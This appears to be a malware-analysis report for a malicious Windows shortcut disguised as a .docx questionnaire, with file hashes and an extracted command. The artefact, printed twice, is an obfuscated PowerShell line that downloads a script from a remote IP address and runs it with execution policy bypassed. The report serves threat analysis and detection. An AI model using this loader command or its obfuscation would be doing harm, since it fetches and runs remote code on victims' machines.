Malicious
ANKETA_SBU.docx.lnk
LNK File | MD5: 6ba6f1b50b88fba0311f08144c955f58 | Size: 8.19 KB | application/x-ms-shortcut
LNK File
MD5: 6ba6f1b50b88fba0311f08144c955f58
Size: 8.19 KB
application/x-ms-shortcut
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 6ba6f1b50b88fba0311f08144c955f58
|
| Sha1 | 867d2368ba533a7ef2e5e14998e3b430900b4e40
|
| Sha256 | 4e131a87998a0d0728b9ce2132ae172e834eaef8c6c66388e7e17a17cc82c64f
|
| Sha384 | db22c3ae57b4a9c5c8ada91c8bdb8b607a515f4d0bb4f5445da99ab91361c8c91a1e7076ab3ca99681b2e4bde9a29339
|
| Sha512 | 608e21a237db01ac4a6566340d7dd525366d02385efe248a98065f6166aabba12aaa9e79f05e629acbccd0b14a436d15baa85e01fe7ba2594c4b70ea4f38f223
|
| SSDeep | 12:8d/NNs0oN9JzVUNm74SN9Jo6es8XNeesniHXSOI+1gqStd/iHNk6qb4DGaOkQr+1:8d/NkPzEWPfedRiiHaqgzdy2GOq
|
| TLSH | 92F166112BF04214F9F2BA3C6E36B200897B356CFE29A7CC0141D5284831956D6F8F2B
|
File Structure
ANKETA_SBU.docx.lnk
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri h''tt''p'':''//5''.8''.''18''.4''6/rkrtt/cookie.ps1 -OutFile cookie.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\cookie.ps1" |
ANKETA_SBU.docx.lnk (8.19 KB)
File Structure
ANKETA_SBU.docx.lnk
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri h''tt''p'':''//5''.8''.''18''.4''6/rkrtt/cookie.ps1 -OutFile cookie.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\cookie.ps1" Malicious |
ANKETA_SBU.docx.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.